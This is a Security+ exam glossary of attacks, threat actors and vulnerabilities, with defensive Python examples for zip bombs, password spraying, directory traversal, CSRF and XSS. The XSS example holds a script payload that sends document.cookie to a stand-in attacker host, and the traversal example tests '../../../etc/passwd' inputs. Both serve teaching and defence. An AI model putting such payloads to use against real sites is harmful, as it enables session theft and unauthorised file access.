CompTIA SY0-601 Security+ Exam Vocabulary (Section 1: Attacks, Threats, and Vulnerabilities)
ZIP Bomb
A highly compressed archive built to exhaust the resources of whatever unpacks it. The classic example is a 42 KB .zip file that, once its nested archives are fully extracted, expands to about 4.5 petabytes (4,500 TB) of data, filling the disk and memory of the antivirus scanner or user that opens it. This is a form of resource exhaustion.
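The practical defense is to inspect an archive before extracting it. The example below is added here and is not code from the original page: it builds a small constructed archive in memory (a few megabytes of zeros, which DEFLATE shrinks by roughly 1000:1, standing in for a real nested bomb), checks the compression ratio and total size from the archive's central directory without decompressing anything, and then shows a streaming extraction that enforces a byte cap in case the headers lie. The thresholds (100:1, 100 MiB) are assumed values to tune per environment.

```python
import io
import os
import zipfile


def build_sample_zip(uncompressed_size=4 * 1024 * 1024):
    """Constructed sample (not a real zip bomb): one member of all-zero bytes,
    which DEFLATE compresses by roughly 1000:1. Real bombs nest archives to
    reach petabytes, but the inspection logic below is the same."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("zeros.bin", b"\x00" * uncompressed_size)
    return buf.getvalue()


def build_benign_zip():
    """Constructed sample: random bytes barely compress, so the ratio is ~1:1."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("random.bin", os.urandom(64 * 1024))
    return buf.getvalue()


def inspect_archive(data, max_ratio=100.0, max_total=100 * 1024 * 1024):
    """Decide whether an archive is safe to extract by reading only its central
    directory. Nothing is decompressed here. Thresholds are assumed defaults."""
    compressed = uncompressed = 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            compressed += info.compress_size
            uncompressed += info.file_size
    ratio = uncompressed / max(compressed, 1)
    return {
        "compressed": compressed,
        "uncompressed": uncompressed,
        "ratio": ratio,
        "safe": ratio <= max_ratio and uncompressed <= max_total,
    }


def extract_member_with_cap(data, name, cap):
    """Stream one member out and count bytes as they arrive, aborting past the
    cap. This guards against a header that understates file_size, which the
    directory-only inspection above would trust."""
    total = 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf, zf.open(name) as member:
        while True:
            chunk = member.read(64 * 1024)
            if not chunk:
                break
            total += len(chunk)
            if total > cap:
                raise ValueError(f"{name}: exceeded {cap} bytes during extraction")
    return total


if __name__ == "__main__":
    bomb = build_sample_zip()
    print(inspect_archive(bomb))                 # ratio far above 100, safe=False
    print(inspect_archive(build_benign_zip()))   # ratio about 1.0, safe=True
```

The header check is cheap and catches the obvious case; the byte cap during extraction is what actually protects you, because the sizes in the central directory are attacker-controlled. Nested archives (a zip inside a zip) need the same check applied recursively with a depth limit.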
Blue Team
A Security Team group. Defensive; protecting the data. They do operational security and control incident response. They hunt for threats, to find and fix holes.
White Team
A Security Team group. Not on a team, they administer the interactions between red and blue, enforcing the rules and resolving any issues. They also manage post-event assessments.
Red Team
A Security Team group. Offensive; ethical hackers hired to attack the organization's systems the way a real adversary would, find exploitable vulnerabilities, and report them so they can be fixed.
Purple Team
A Security Team group. Red and blue teams working together, cooperating instead of competing. They give feedback to each other based on results.
Refactoring
A driver manipulation method. The code of a driver (or of malware posing as one) is rewritten so that it keeps exactly the same behavior but has a different form, so signature-based antivirus no longer recognizes it (metamorphic code).
Shimming
A driver manipulation method. It uses a small layer of additional code (a shim) placed between an application and a driver to modify the driver's behavior. Windows includes an application-compatibility shim framework for exactly this purpose (backwards compatibility with older software), and attackers can register their own shims to inject code into a legitimate process.
Typosquatting
A form of URL hijacking that relies on the user mistyping a link, or misreading a deliberately misspelled one. ex: https://professormessor.com instead of professormesser.com
Prepending
A form of URL hijacking that adds characters to the front of a legitimate domain name, relying on the victim overlooking the extra characters when they click a link or see an email from the domain. ex: https://pprofessormesser.com
On Premises Security
Security run on your own premises, by your own staff. Positives: + Customize your security posture (you have full control). + An on-site team can manage security directly. + The local team manages uptime and availability. Negatives: - A local team may be expensive and difficult to staff. - Security changes can take time.
Cloud-Based Security
Security delivered by a cloud provider. Positives: + Data is kept in a secure environment. + Providers manage security at large scale. + Limited downtime. + Scalable security options. + Less expensive. Negatives: - A third party may have access to your data. - Users must still follow security best practices. - Not as customizable as on-premises.
Trojan Horse
Malware that pretends to be something legitimate (a useful program, a document) so the user installs it. Once it's inside, it has free rein: it can install other malware, open a backdoor, or take over the computer.
Crypto-ransomware
Ransomware that encrypts the victim's files with a key only the attacker holds. The data stays on disk but is unusable until the victim pays for the decryption key. There is no guarantee that paying works, so offline backups are the real defense.
Botnets
A network of compromised computers (bots) controlled together for a common goal, often a DDoS. Operators frequently rent them out to other attackers.
Spraying Attack
A password attack that tries a few very common passwords (e.g. the top three on a leaked-password list) against many different accounts. Because each account only sees one or two attempts, it stays under the lockout thresholds that would stop a brute-force attack on a single account.
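Because spraying keeps per-account failures low, detection has to pivot on the source rather than the account. The example below is added here and is not code from the original page: it parses a constructed set of failed-login log lines (the format and the addresses, from the documentation ranges 203.0.113.0/24, 198.51.100.0/24 and 192.0.2.0/24, are invented for the example) and labels each source address as spraying (many accounts, few attempts each), brute force (one account hammered), or normal. The thresholds are assumed starting points.

```python
import re
from collections import defaultdict

# Constructed sample log lines (not from any real system).
SAMPLE_LOG = """\
2024-05-01T10:00:01 FAIL user=alice src=203.0.113.5
2024-05-01T10:00:03 FAIL user=bob src=203.0.113.5
2024-05-01T10:00:05 FAIL user=carol src=203.0.113.5
2024-05-01T10:00:07 FAIL user=dave src=203.0.113.5
2024-05-01T10:00:09 FAIL user=erin src=203.0.113.5
2024-05-01T10:00:11 FAIL user=frank src=203.0.113.5
2024-05-01T10:00:13 FAIL user=grace src=203.0.113.5
2024-05-01T10:00:15 FAIL user=heidi src=203.0.113.5
2024-05-01T10:00:17 FAIL user=ivan src=203.0.113.5
2024-05-01T10:00:19 FAIL user=judy src=203.0.113.5
2024-05-01T10:01:00 FAIL user=alice src=198.51.100.7
2024-05-01T10:01:01 FAIL user=alice src=198.51.100.7
2024-05-01T10:01:02 FAIL user=alice src=198.51.100.7
2024-05-01T10:01:03 FAIL user=alice src=198.51.100.7
2024-05-01T10:01:04 FAIL user=alice src=198.51.100.7
2024-05-01T10:01:05 FAIL user=alice src=198.51.100.7
2024-05-01T10:01:06 FAIL user=alice src=198.51.100.7
2024-05-01T10:01:07 FAIL user=alice src=198.51.100.7
2024-05-01T10:01:08 FAIL user=alice src=198.51.100.7
2024-05-01T10:01:09 FAIL user=alice src=198.51.100.7
2024-05-01T10:01:10 FAIL user=alice src=198.51.100.7
2024-05-01T10:01:11 FAIL user=alice src=198.51.100.7
2024-05-01T10:02:00 FAIL user=mallory src=192.0.2.9
2024-05-01T10:02:30 OK user=mallory src=192.0.2.9
"""

# Assumed log format: "<timestamp> FAIL|OK user=<name> src=<ip>"
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<result>FAIL|OK) user=(?P<user>\S+) src=(?P<src>\S+)$")


def failures_by_source(log_text):
    """Map source IP -> {user: number of failed attempts}."""
    counts = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and m["result"] == "FAIL":
            counts[m["src"]][m["user"]] += 1
    return counts


def classify_sources(log_text, spray_min_users=8, spray_max_per_user=3, brute_min_attempts=10):
    """Label each source address by the shape of its failures:
    'password spraying' = many distinct accounts, each tried only a few times;
    'brute force'       = at least one account tried many times;
    'normal'            = neither pattern (e.g. a user who mistyped once)."""
    labels = {}
    for src, per_user in failures_by_source(log_text).items():
        distinct_users = len(per_user)
        worst = max(per_user.values())
        if worst >= brute_min_attempts:
            labels[src] = "brute force"
        elif distinct_users >= spray_min_users and worst <= spray_max_per_user:
            labels[src] = "password spraying"
        else:
            labels[src] = "normal"
    return labels


if __name__ == "__main__":
    for src, label in classify_sources(SAMPLE_LOG).items():
        print(f"{src:15} {label}")
```

In production the counting should be done per time window, and real sprays often rotate source addresses and spread attempts over days, so correlating on user-agent, the round-robin ordering of accounts, or the identity provider's own "unfamiliar sign-in" signals is usually needed as well.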
Radio Frequency Jamming
A person or a device intentionally or unintentionally interferes with your wireless network transmissions. The receiving device cannot get a solid connection to the network. This may be caused by microwave ovens and fluorescent lights (assuming it was accidental).
Spear Phishing
A phishing attack aimed at a specific person or small group, using details about them to look credible. When the target is a senior executive such as a CEO or CFO (someone with access to money or sensitive data), it is called whaling.
Pharming
Redirecting users from a legitimate site to a bogus copy without their doing anything wrong, usually by poisoning a DNS server or the victim's local hosts file so the real domain name resolves to the attacker's server.
Resource Exhaustion
A situation in which a device with limited resources (CPU, memory, file system storage, network bandwidth, etc.) is made to consume more than it has by an attacker who deliberately triggers it. The result is a crash or denial of service (DoS).
Influence Campaign
A sway of public opinion on political and social issues. They aim to manipulate people's thinking in a certain area.
Buffer Overflow
An attack that sends more data to a fixed-size buffer in memory than it can hold, so the excess spills into adjacent memory. At minimum this crashes the program; a carefully crafted overflow overwrites return addresses or pointers and lets the attacker run their own code.
Hoax
A threat that doesn't actually exist. Wastes a lot of time and resources (usually spread by email, social media posts, etc.).
Social Media Attack Vectors
A type of Attack Vector. Attackers can use the information that you post online (where you are and when, vacation pictures are a big part).
Supply Chain Attack Vectors
A type of Attack Vector. Corporations usually buy things from a third party, these can be tampered with on every step of the way.
Email Attack Vectors
A type of Attack Vector. Done through phishing or delivering malware through email. Sent to a potential victim.
Direct Access Attack Vectors
A type of Attack Vector. Involves physical access to a system, which is why they are usually locked up (to prevent this).
Cloud Attack Vectors
A type of Attack Vector. Involves publicly facing applications and services. They may be attacked and become vulnerable points.
Wireless Attack Vectors
A type of Attack Vector. Takes advantage of access points that may not be secure. Watch out for Rogue Access Points and Evil Twins.
Removable Media Attack Vectors
A type of Attack Vector. Removable media bypasses the firewall and other network security because nothing crosses the network. An attacker could plug in a device that copies data out, or leave malicious USB flash drives around that infect whatever they are plugged into.
Unauthorized Hackers
A type of Threat Actor & Hacker. These hackers are malicious and aim for personal gain. (ex. money, information, both, etc.)
Authorized Hackers
A type of Threat Actor & Hacker. They are hackers that are ethical with good intentions, and have permission to hack.
Semi-Authorized Hackers
A type of Threat Actor and Hacker. These hackers find a vulnerability without permission, but don't use it for harm; they may be more of a "researcher."
Shadow IT
A type of Threat Actor. Computer hardware, software, or cloud services used inside an organization without the knowledge or approval of the IT or security team. It is internal by definition, and it bypasses the review and controls that sanctioned systems go through, creating unmanaged risk.
Competitors
A type of Threat Actor. Rival companies. They can be sophisticated and well funded, and their intentions vary: stealing customer lists, taking financial information, disrupting operations, or simply holding the capability to act on a vulnerability later.
Nation States
A type of Threat Actor. Governments and the groups they sponsor. They are the most sophisticated and best-funded actors, often running long-term campaigns (APTs) for espionage, sabotage, or influence, and may cooperate with other states.
Insiders
A type of Threat Actor. Someone inside the organization (an employee or contractor) who attacks it. The insider has inside knowledge, so they know which systems are vulnerable and valuable and can direct attacks precisely.
Hacktivist
A type of Threat Actor. Hackers with a cause: social change or a political agenda. They are usually external. Attacks are often sophisticated and very specific (defacing a site, DoS, or leaking data of a chosen target).
Organized Crime
A type of Threat Actor. They are professionals, motivated by money and almost always an external entity. They are very sophisticated and organized: one person hacks, one person manages exploits, another person sells the data, etc.
Script Kiddies
A type of Threat Actor. They run pre-made scripts and tools they did not write, trying them until one works against the system. Little skill required; can be external or internal.
Dark Web Intelligence
A type of Threat Intelligence. Accessing this area of the Internet is very difficult, yet a lot of information can be found there, often being the information of hacker groups and services (like what they do, their tools, what they are selling, etc).
Vulnerability Databases
A type of Threat Intelligence. Researchers find vulnerabilities and publish them here, so everyone can see them. It is essentially a huge, searchable list of known vulnerabilities. Examples: the Common Vulnerabilities and Exposures (CVE) list, and the U.S. National Vulnerability Database (NVD).
Predictive Analysis
A type of Threat Intelligence. Analyzing large amounts of data quickly (often with machine learning) to find suspicious patterns and behaviors that indicate a potential attack before it happens.
Closed Intelligence
A type of Threat Intelligence. This intelligence was compiled by someone else, and is unavailable to the public. However, it can be purchased.
File/Code Repositories
A type of Threat Intelligence. This may contain a public program that is used to hack into a computer. See what's published, and defend against it.
Local Industry Groups for Threat Research
A type of Threat Research. A gathering of local peers in the industry that may discuss local challenges and the securing of specific technologies.
Academic Journals Threat Research
A type of Threat Research. Peer-reviewed publications written by professionals and researchers that keep up with the latest attack methods, often in great detail. Very credible, but often slower to appear than blog posts or vendor advisories.
Vulnerability Feeds for Threat Research
A type of Threat Research. Data supplied to vulnerability scan software that provides information about the latest vulnerabilities, often through notifications.
Social Media and Threat Research
A type of Threat Research. Hacking groups on here can be monitored, revealing potential exploit attempts.
Vendor Websites for Threat Research
A type of Threat Research. On this type of website, you can see if a vendor discovers a new vulnerability in their software; they know their software best, of course.
Conferences for Threat Research
A type of Threat Research. These may involve people meeting up to discuss potential security concerns and vulnerabilities, maybe even being an "early warning" of sorts.
Zero-Day Attack Vulnerability
A type of Vulnerability. A vulnerability that is unknown to the vendor, so no patch exists (the vendor has had "zero days" to fix it). Attackers who find one can exploit it before defenders even know to look, which is why researchers and attackers alike work hard to find them.
Error Vulnerability
A type of Vulnerability. Error messages can give a LOT to an attacker: service type, version information, stack traces and debug data. Show users a generic message and log the details server-side. Ex: a full stack trace VS "This website failed to open the page."
Default Settings Vulnerability
A type of Vulnerability. Every device ships with a default login (often something like admin/admin). Attackers try these first, and botnets can scan the whole Internet for devices still using them at massive speed (the Mirai botnet was built this way). Change defaults before a device goes online.
Improper Patch Management Vulnerability
A type of Vulnerability. Happens when patches are not applied at all, not applied promptly, or applied inconsistently across systems, leaving known vulnerabilities open. Track what is installed and verify that patches actually land.
Open Ports and Services Vulnerability
A type of Vulnerability. Every open port is a service an attacker can talk to. Close what isn't needed and restrict access (firewall rules) to the ports that services/applications must expose.
Open Permissions Vulnerability
A type of Vulnerability. Permissions are accidently left open, allowing too many people to access things (like cloud storage). Be sure to secure this!
Insecure Protocols Vulnerability
A type of Vulnerability. Some protocols are not encrypted and send traffic in the clear (Telnet, FTP, HTTP, SNMPv1/v2), so anyone on the path can read or modify it. Use the encrypted equivalents (SSH, SFTP, HTTPS, SNMPv3), especially for credentials and other vital information.
Weak Encryption Vulnerability
A type of Vulnerability. Some encryption types are too weak to be safe: key sizes under 128 bits, outdated hashes such as MD5 and SHA-1, and broken wireless protocols such as WEP and the original WPA (TKIP). Use current algorithms instead (AES, SHA-2, WPA2/WPA3).
Legacy Platform Vulnerability
A type of Vulnerability. The use of an older or outdated device which is installed still on the network. There may be a lot of easy access points within these due to the age of the technology. Either replace them, or protect them with firewalls and other safety methods.
Unsecured Root Accounts Vulnerability
A type of Vulnerability. The main "root" or "administrator" accounts are protected only by weak, easy-to-guess passwords, or are used directly for day-to-day work. Protect them with strong credentials and MFA, disable direct root login where possible, and limit this level of access to only 1-2 accounts in a company.
Intrusive Scan
A type of scan. Finding a vulnerability and trying to exploit it.
Non-Intrusive Scan
A type of scan. Gathering information without attempting to exploit a vulnerability.
Non-Credentialed Scans
A type of scan. The scanner cannot log into the remote device.
Credentialed Scan
A type of scan. The scanner has access to the device; it can mimic an insider attack.
Race Conditions
A vulnerability that occurs when the outcome depends on the order or timing of operations that can overlap. If two things happen at the same time and the code hasn't planned for it, an attacker can slip in between the steps. This can lead to devastating outcomes.
Vulnerabilities
A weakness in a system that an attacker can use to get in. There are many types, and many kinds of attacks that exploit them.
APT
Advanced Persistent Threat. A type of Threat Actor. Attackers are in the network, undetected, and are persistent there until taken out.
NFC Attack
An attack against mobile devices that use Near Field Communication. Near Field Communication is a group of standards that allow mobile devices to communicate with nearby mobile devices.
Domain Hijacking
An attack that changes the registration of a domain name without permission from the owner, or simply takes over the registrar account that controls it. The attacker then controls where the domain's traffic flows.
SSL Stripping
An attack that strips the security from HTTPS-enabled websites. It combines an on-path attack with a downgrade attack: the attacker sits in the middle of the conversation, talks HTTPS to the web server but plain HTTP to the victim, and modifies data between them. The victim cannot easily see a problem. Relies on the site accepting unencrypted HTTP at all; HSTS prevents it.
MAC Flooding
An attack that sends numerous frames to a switch, each with a different source MAC address, to fill up the switch's MAC address table. When the table is full the switch fails open and floods every frame out of all ports like a hub, so the attacker can sniff traffic meant for other devices.
Bluejacking
An attack that sends unsolicited messages to Bluetooth-enabled devices, usually abusing the contact-card exchange feature. Mostly a nuisance; compare Bluesnarfing, which actually steals data from the device. Modern devices require pairing and confirmation, which largely mitigates it.
DNS Poisoning
An attack that inserts false records into a DNS server's cache (or the client's hosts file), so that the computer is automatically redirected to an attacker's device or website of their choice.
Directory Traversal
An attack that abuses a web application that builds file paths from user input, using ../ sequences to step out of the web root into restricted directories. Ex: users shouldn't be able to browse the Windows folder, but a request like ../../Windows/system.ini might get them there.
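The defense is to resolve the requested path and refuse anything that lands outside the document root. The example below is added here and is not code from the original page; the document root /var/www/html is an assumed value. It decodes percent-encoding once (so %2e%2e%2f is seen as ../ before the check), collapses . and .. segments, and then requires the result to sit under the root with a trailing separator so a sibling directory such as /var/www/html2 does not pass the prefix test.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root for this example.
WEB_ROOT = "/var/www/html"


def resolve_under_root(root, requested):
    """Return the file path for a requested URL path, or None if the request
    would escape the document root.

    The check is purely lexical: it does not follow symlinks, so on a real
    filesystem also compare os.path.realpath() of the result against the root.
    """
    # Decode percent-encoding once, so encoded traversal is seen as ../ here.
    decoded = unquote(requested)
    root_norm = posixpath.normpath(root)
    # Treat the request as relative to the root, then collapse . and .. segments.
    candidate = posixpath.normpath(posixpath.join(root_norm, decoded.lstrip("/")))
    # Require the separator so "/var/www/html2/x" is not accepted for root "/var/www/html".
    if candidate == root_norm or candidate.startswith(root_norm + "/"):
        return candidate
    return None


if __name__ == "__main__":
    for req in ["images/logo.png", "../../../etc/passwd", "%2e%2e/%2e%2e/%2e%2e/etc/passwd"]:
        print(f"{req!r:45} -> {resolve_under_root(WEB_ROOT, req)}")
```

On Windows hosts the backslash is also a path separator, so a server there must normalize both before checking. Double-encoded input (%252e) decodes to a literal %2e here and is treated as a filename, which is the correct outcome: decode exactly once, then check.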
Brute Force Attack
An attacker tries every possible password combination, hashing each one until the result matches the stolen hash (or until a login succeeds). This can take a very long time; they would start with 'aaaaa' and work upward.
API Attacks
Application Programming Interface Attacks. Attackers look for vulnerabilities in this new communication path (it may expose sensitive information, DoS, privileged access, etc)
AI
Artificial Intelligence. Machines are getting smarter: they can identify patterns in data and improve predictions. This requires a lot of training data, but is very useful. Yet, it can be manipulated and confused (poisoned training data, adversarial inputs) into making wrong decisions or leaking vital information.
Session Hijacking
Attacker gains access to the session ID and can send it to the server to gain access to the victim's account. Nothing else is needed. This can be obtained through the victim's cookies and other ways.
Credential Harvesting
Attackers collect login credentials; many ways to do this.
RFID Attack
Attacks against Radio-Frequency Identification systems, the tags and readers used for access badges, inventory tracking and contactless cards. Common attacks are eavesdropping, replay, cloning, and DoS (jamming).
AIS
Automated Indicator Sharing. A type of Threat Intelligence. A CISA program for exchanging threat indicators between organizations and the U.S. government automatically and at machine speed. Indicators are described in the STIX format and transported over TAXII.
Cross-Site Request
The browser loads one page from multiple servers. Example: one server sends the text, another loads a YouTube video, another a picture, and so on. This is normal, yet it is also the mechanism that cross-site request forgery and cross-site scripting abuse.
Backdoors
Created by some Malwares when it is installed. It installs a program that opens a "back door" to make it easier to get back into the system. Other Malware can use this backdoor.
XSRF
Cross-Site Request Forgery. Often known as a "one-click attack", it takes advantage of the trust that a web application has for the user. The web site trusts your browser (it sends your cookies automatically), so an attacker's page can make the browser send requests in your name without your consent or knowledge. Defenses: anti-CSRF tokens and SameSite cookies.
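An anti-CSRF token works because the attacker's page can trigger a request but cannot read a value the server embedded in the victim's own page. The example below is added here and is not code from the original page: it issues a synchronizer token bound to the session with an HMAC (so a token cannot be minted for, or reused against, another session), verifies it in constant time, and shows a toy state-changing endpoint that rejects a forged cross-site form post. The server secret, the origin https://bank.example and the request dictionary shape are assumptions for the example.

```python
import hmac
import hashlib
import secrets

# Assumed server-side secret; in production load it from configuration, not code.
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id, secret=SERVER_SECRET):
    """Synchronizer token bound to the session: nonce || HMAC(secret, session_id:nonce).
    The HMAC means an attacker cannot mint a token for a session they do not own,
    and the nonce stops the token from being a fixed value per session."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id, token, secret=SERVER_SECRET):
    """Recompute the HMAC for this session and compare in constant time."""
    if not token or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def handle_transfer(request, session_id):
    """Toy state-changing endpoint. `request` is a dict standing in for a parsed
    HTTP request: the form fields plus the Origin header. The session cookie
    alone proves nothing about intent, because the browser attaches it to any
    cross-site form submission an attacker's page triggers."""
    form = request.get("form", {})
    if not verify_csrf_token(session_id, form.get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    # Defense in depth: a present Origin header must match our own site.
    if request.get("origin") not in (None, "https://bank.example"):
        return 403, "cross-origin request rejected"
    return 200, f"transferred {form['amount']} to {form['to']}"


if __name__ == "__main__":
    sid = "session-abc123"
    tok = issue_csrf_token(sid)
    print(handle_transfer({"origin": "https://bank.example",
                           "form": {"csrf_token": tok, "amount": "100", "to": "alice"}}, sid))
    print(handle_transfer({"origin": "https://attacker.example",
                           "form": {"amount": "100", "to": "attacker"}}, sid))
```

Setting the session cookie with SameSite=Lax (or Strict) blocks most cross-site POSTs at the browser before they reach this code; the token remains the primary control because older clients and some navigation cases do not honor SameSite.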
XSS
Cross-site scripting (abbreviated XSS because CSS already meant style sheets). So named because it originally exploited browser flaws that let information from one site be shared with another. One of the most common web application development errors: the site echoes attacker-supplied input into a page without escaping it, so the script runs in other users' browsers with the trust those users have for the site.
Persistent (stored): the attacker posts a message containing the malicious payload to a site that stores it, such as a social network. It is now "persistent": everyone who views the post runs the script. It has no specific target and can spread quickly on social media.
Non-persistent (reflected): the web site reflects user input (a search term) back into the page without escaping it. The attacker emails a link that takes advantage of this; when the victim clicks it, the script runs and steals session IDs and cookies, which the attacker uses to quietly take over the victim's account.
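The root cause in both variants is the same: untrusted input rendered into HTML without output encoding. The example below is added here and is not code from the original page. It shows a reflected search page in its vulnerable form and its escaped form, a stored-message renderer that escapes at render time rather than trusting what was stored, and the cookie attributes that limit the damage if a script does run. The payload, the site and the hostname attacker.example are constructed for the example.

```python
import html

# Constructed payload: a reflected-XSS probe that would exfiltrate the session cookie.
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def render_search_unsafe(query):
    """Reflected XSS: the search term is pasted straight into the page, so the
    browser executes any <script> it contains."""
    return f"<p>Results for: {query}</p>"


def render_search_safe(query):
    """Same page with output encoding for the HTML text/attribute context.
    html.escape turns < > & " ' into entities, so the payload is shown, not run."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def render_messages(messages):
    """Stored XSS defense: the database may hold raw attacker input (it was
    accepted as a message). Escape at render time, every time, instead of
    trusting that it was cleaned on the way in."""
    items = "".join(f"<li>{html.escape(m, quote=True)}</li>" for m in messages)
    return f"<ul>{items}</ul>"


def session_cookie_header(session_id):
    """Limit the damage if a script does run: HttpOnly keeps document.cookie
    from reading the session ID, Secure keeps it off plain HTTP, and SameSite
    limits when the browser sends it cross-site."""
    return f"Set-Cookie: session={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/"


if __name__ == "__main__":
    print(render_search_unsafe(PAYLOAD))   # contains a live <script> tag
    print(render_search_safe(PAYLOAD))     # contains &lt;script&gt; instead
    print(session_cookie_header("c0ffee"))
```

html.escape is correct only for HTML text and quoted attribute values. Input placed inside a JavaScript block, a URL, or a CSS property needs encoding for that context, which is why templating engines that escape by default and a Content Security Policy are the practical way to cover every output point.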
DoS
Denial of Service. Forcing the service to fail, usually by overloading it. It often takes advantage of a design flaw or vulnerability.
DDoS
Distributed Denial of Service. An army of computers is launched to bring down a service, by using all of the bandwidth or resources, creating a traffic spike. This is what botnets are used for, as the bots would make a coordinated attack.
On-Path Attack
Formerly known as "man in the middle". The attacker sits between the victim and the destination and redirects the victim's traffic through themselves without their knowledge. They relay it on so neither side notices, and can read or modify anything that passes.
Privilege Escalation
Gaining a higher-level access to a system using a vulnerability or bug/design flaw. The higher the access, the more capable the attackers are to cause damage. This is a high-priority vulnerability.
Working Knowledge
How much the testers know about the target before a penetration test. Unknown environment (black box), known environment (white box), or partially known (gray box).
Bots
If your computer is infected, it becomes this. Can be put on your computer from a Trojan Horse or an application vulnerability. It is controlled through a Command and Control center, and otherwise just waits.
Wireless Disassociation Attack
Also called wireless deauthentication. The attacker sends forged 802.11 management frames that kick a client off the network, so the connection goes from working to not working, then working again, and so on. It is a significant wireless denial of service (DoS) attack; protected management frames (802.11w) mitigate it.
Replay Attack
In this attack, the attacker captures a valid transmission as it passes between the client and the server (a login, a session token, an authentication hash), then resends it later as their own request to gain access to the valid account. Timestamps, one-time nonces and session expiry defend against it.
Intelligence Fusion
In threat hunting, using sources of threat intelligence data to automate detection of adversary IoCs and TTPs.
IOC
Indicators of Compromise. A type of Threat Intelligence. An event that indicates an intrusion, like an unusual amount of network activity, or a change to file hash values (showing the modification of files) and more.
Cookies
Information stored on your computer by the browser. This is used for tracking, personalization, session management, etc. It usually isn't a security risk unless someone else obtains them; session IDs are often stored there, and a stolen session cookie lets an attacker hijack the session.
Downgrade Attack
Instead of using perfectly good encryption, the systems are forced to negotiate a weaker algorithm or older protocol version (or none at all). This creates a vulnerability the attacker can then exploit.
Injection Attack
Involves "adding" something that does not belong: the attacker supplies their own code or commands (SQL, LDAP, OS commands, XML) where the application expected plain data, because the input isn't validated.
Threat Intelligence
Involves having knowledge about threats. May involve collecting and researching information/data to stay informed.
Rainbow Tables
Large precomputed tables of password hashes that are used in password attacks: look up the stolen hash and read off the password, with no hashing needed at attack time. A different table is needed for each hashing method, and salting makes them useless.
Malware
Malicious software which aims to do harm to your computer or your information. There are many, MANY methods of doing this. They often work together.
Viruses
Malware that can reproduce itself. They can "infect" many files and damage them. Thousands of new ones are made every week.
Ransomware
Malware that holds the victim's data or system hostage and demands payment. Simpler variants just lock the screen or make threats that are often fake; the more extreme crypto-ransomware (see above) actually encrypts the files.
Rootkits
Malware that modifies the kernel of the OS to avoid being detected by antivirus/anti-malware. Often combined with other malware. It's invisible to the OS, Task Manager, and antivirus/anti-malware tools.
Worms
Malware that self-replicates. It uses the network as a transmission medium, spreading very quickly and easily. It can take over thousands of devices by itself, and cannot easily be stopped once inside the network.
Spyware
Malware that spies on you, taking your information for advertising, identity theft, and affiliate fraud. May also include browser monitoring and keylogging.
Malicious Hardware
May include USBs and flash drives. Do not plug in an unknown piece of hardware into your computer, as it might turn out to be this. It can infect the computer with malware through many methods.
Plaintext
Normal text that has not been encrypted. Storing passwords like this is a terrible idea.
Logic Bombs
Often planted to wait for a predefined event: a time or date, or a user action (e.g. an employee's account being removed). It is difficult to identify beforehand and difficult to recover from once it goes off. Usually planted by an insider with access; they can delete data and master boot records.
OSINT
Open-Source Intelligence. A type of Threat Intelligence. Publicly available and a good place to start searching. Includes the Internet and governmental/commercial data.
PUPs
Potentially Unwanted Programs. Identified by anti-virus and is usually installed with other software.
Salt
Random data added to a password before hashing. Every user gets their own random salt, so two users with the same password get different hashes, and a precomputed rainbow table is useless because it would have to be rebuilt for every salt.
Supply Chain Order
Raw materials -> Suppliers -> Manufacturers -> Distributors -> Customers -> Consumers
URL Hijacking
Relies on mistakes in the URL to make a user go to a phishing site. Includes Typosquatting, Prepending, and more.
RATs
Remote Access Trojans. The ultimate backdoor, malware installs the server/service/host, and attackers can connect to it with the client software. They basically gain access to a device and can keylog, screen record, copy files, and more.
RFCs Threat Research
Requests for Comments. A type of Threat Research. The technical documents that define Internet protocols, written by the Internet Engineering Task Force (IETF) and published under the Internet Society (ISOC). Some RFCs specifically analyze threats to a protocol, and most standards include a Security Considerations section.
Smishing
SMS/text phishing
SIEM
Security Information and Event Management. The logging of security events and information. Data from different sources may be able to be correlated, linking diverse data types. Additionally, forensic analysis can be done after a security breach happens.
SOAR
Security Orchestration, Automation, and Response. Automates security operations: playbooks and runbooks take alerts (often from a SIEM) and carry out the response steps, such as blocking an IP, disabling an account, or opening a ticket, without waiting for a human.
SSRF
Server-Side Request Forgery. The attacker finds a web application that fetches URLs supplied by the user and makes the server send requests on the attacker's behalf, reaching internal systems (metadata services, databases, admin interfaces) the attacker cannot reach directly. Caused by not validating the destination of server-side requests.
MAC Cloning
Setting your own network interface's MAC address to match that of another device (many home routers let you set the WAN port's MAC to the PC's address to keep an ISP lease). Attackers use it to pass MAC-based filters or to impersonate an existing device.
Shoulder Surfing
Simply looking over someone's shoulder to obtain any information on the computer. This could include vital information, depending on what the victim is doing.
Pretexting
Social engineering; lying to get information. The attacker creates a situation and puts themselves into it.
Impersonation
Social engineering; pretending to be someone who you are not. For example, an attacker may forge an email from Microsoft commenting on concerns with a user's computer. Tricking someone with this may cause them to give away more information.
Improper Input Handling
Software that allows the user to enter data but does not validate or filter user input to prevent a malicious action. An attacker could type a line of code to make the website do something unintended.
Adware
Software that displays advertisements. Often installed with other software (a PUP). It may cause issues with performance. Not really malware; it doesn't try to harm your computer, at least on the surface.
Improper Error Handling
Software that does not properly trap an error condition and provides an attacker with underlying access to the system. Errors should not have a lot of detail to prevent this.
Skimming
Stealing credit card information, usually during a normal transaction (with cameras, card readers, or human eyes). People can copy data from the card, such as the number, expiration date, your name, and more. Attackers can use this information for other transactions.
STIX
